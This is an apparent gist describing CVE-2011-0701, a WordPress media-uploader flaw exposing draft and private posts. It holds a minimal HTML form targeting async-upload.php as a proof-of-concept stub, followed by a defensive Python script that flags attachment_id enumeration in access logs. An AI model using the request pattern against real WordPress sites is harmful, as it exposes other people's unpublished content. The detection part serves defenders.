Last active July 15, 2022 08:12
CVE-2011-0701 wp-admin/async-upload.php in the media uploader in WordPress before 3.0.5 allows remote authenticated users to read (1) draft posts or (2) private posts via a modified attachment_id parameter.
<form enctype="multipart/form-data" action="https://example.com/wp-admin/async-upload.php" method="post">
  <input type="file" name="uploadfile">
  <input type="submit" value="upload">
</form>
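
Added example, not part of the original gist: a log check a defender could run to spot one client requesting many different attachment_id values against wp-admin/async-upload.php. It assumes Combined Log Format and that the parameter appears in the URL query string; the function names, the threshold and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined Log Format (assumed): client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3} '
)
TARGET_PATH = "/wp-admin/async-upload.php"

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jul/2022:08:12:01 +0000] "POST /wp-admin/async-upload.php?attachment_id=101 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Jul/2022:08:12:02 +0000] "POST /wp-admin/async-upload.php?attachment_id=102 HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Jul/2022:08:12:03 +0000] "POST /wp-admin/async-upload.php?attachment_id=103 HTTP/1.1" 200 530 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [15/Jul/2022:08:13:10 +0000] "POST /wp-admin/async-upload.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [15/Jul/2022:08:13:40 +0000] "POST /wp-admin/async-upload.php?attachment_id=55 HTTP/1.1" 200 301 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [15/Jul/2022:08:14:02 +0000] "GET /?attachment_id=9 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]


def attachment_ids_by_client(lines):
    """Map client IP -> set of attachment_id values sent to async-upload.php."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m.group("target"))
        if url.path != TARGET_PATH:
            continue  # attachment_id on other paths is out of scope here
        for value in parse_qs(url.query).get("attachment_id", []):
            seen[m.group("ip")].add(value)
    return dict(seen)


def flag_enumeration(lines, threshold=3):
    """Return clients that requested at least `threshold` distinct IDs."""
    return {
        ip: sorted(ids)
        for ip, ids in attachment_ids_by_client(lines).items()
        if len(ids) >= threshold
    }


if __name__ == "__main__":
    for ip, ids in flag_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {len(ids)} distinct attachment_id values: {', '.join(ids)}")
```

Access logs record only the URL, so an attachment_id sent in a POST body will not show up here and needs request-body logging at a WAF or in the application.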